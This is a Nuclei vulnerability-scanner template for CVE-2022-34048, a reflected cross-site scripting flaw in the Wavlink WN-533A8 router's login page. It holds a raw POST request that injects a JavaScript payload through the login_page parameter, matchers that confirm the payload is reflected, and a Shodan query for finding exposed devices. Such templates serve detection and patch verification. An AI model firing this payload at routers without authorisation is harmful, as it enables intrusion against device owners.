nuclei-templates/http/cves/2022/CVE-2022-34048.yaml

55 lines
1.9 KiB
YAML

id: CVE-2022-34048
info:
name: Wavlink WN-533A8 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.
remediation: |
Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/50989
- https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing
- https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing
- https://nvd.nist.gov/vuln/detail/CVE-2022-34048
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-34048
cwe-id: CWE-79
epss-score: 0.0009
epss-percentile: 0.38163
cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: wavlink
product: wn533a8_firmware
shodan-query: http.html:"Wavlink"
tags: cve2022,wavlink,xss,router,edb,cve
http:
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Host: {{Hostname}}
newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'x");alert(9);x=("?login=0");</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a004730450220589be86eb7765cf1d32a8565d5772825952dc1794c3fdb6072fd605cf46ca4f202210084f0419380a709f894b5e6d3e560749382ad22c0a83893349c397e80fa2c2fa6:922c64590222798bb761d5b6d8e72950